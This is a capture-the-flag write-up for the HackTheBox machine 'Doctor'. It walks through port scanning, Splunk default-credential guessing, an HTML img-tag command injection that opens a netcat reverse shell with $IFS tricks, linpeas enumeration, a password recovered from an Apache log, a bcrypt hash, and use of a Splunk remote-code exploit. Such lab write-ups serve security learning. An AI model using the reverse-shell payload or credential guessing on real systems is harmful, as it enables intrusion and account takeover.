CTF-Writeups/HackTheBox/Doctor.md
2020-11-18 15:49:09 +05:00

3 KiB

HackTheBox-Doctor

NMAP

Nmap scan report for 10.10.10.209
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80

Looking at source code we see a domain name doctors.htb

So let's try to add this on to our /etc/hosts

doctors.htb

We can register and login with an account but it's not really useful

PORT 8089

I tried searching for default credentials for splunkd beacause for navigating to servicesNS credentials are required so I tried admin:admin and admin:changeme but didn't worked

Then I found this repository on GitHub

We are going to use PySplunkWhisperer2_remote because it's not being hosted on our machine

But this would not work becasue we need the credentials so I head over back to doctors.htb logged in as a new user at this point I didn't do it myself I had a little help from discord server

<img src=http://IP/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'IP'$IFS'PORT')>

I didn't find anything on the box through manual enumeration so going to go with linpeas

This was the only interesting thing that linpeas found

Reading /var/log/apache2/backup

email=Guitar123

Now I tried this at doctors.htb/login to reset the password but there was no email registered with this

By ruuning linpeas and found that there is a user named shaun so I guessed maybe this would be his password and I logged in with shaun

Then I again ran linpeas

And found some credentials in form of bcrypt hash

$2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S

But I could not crack this so I then returned to that exploit that we found and ran python3 PySplunkWhisperer2_remote.py

So this means that we are authenticated and now only need to include the payload

And we are done , this wasn't really an "Easy" machine . Coming from TryHackMe , HackTheBox is way more diffcult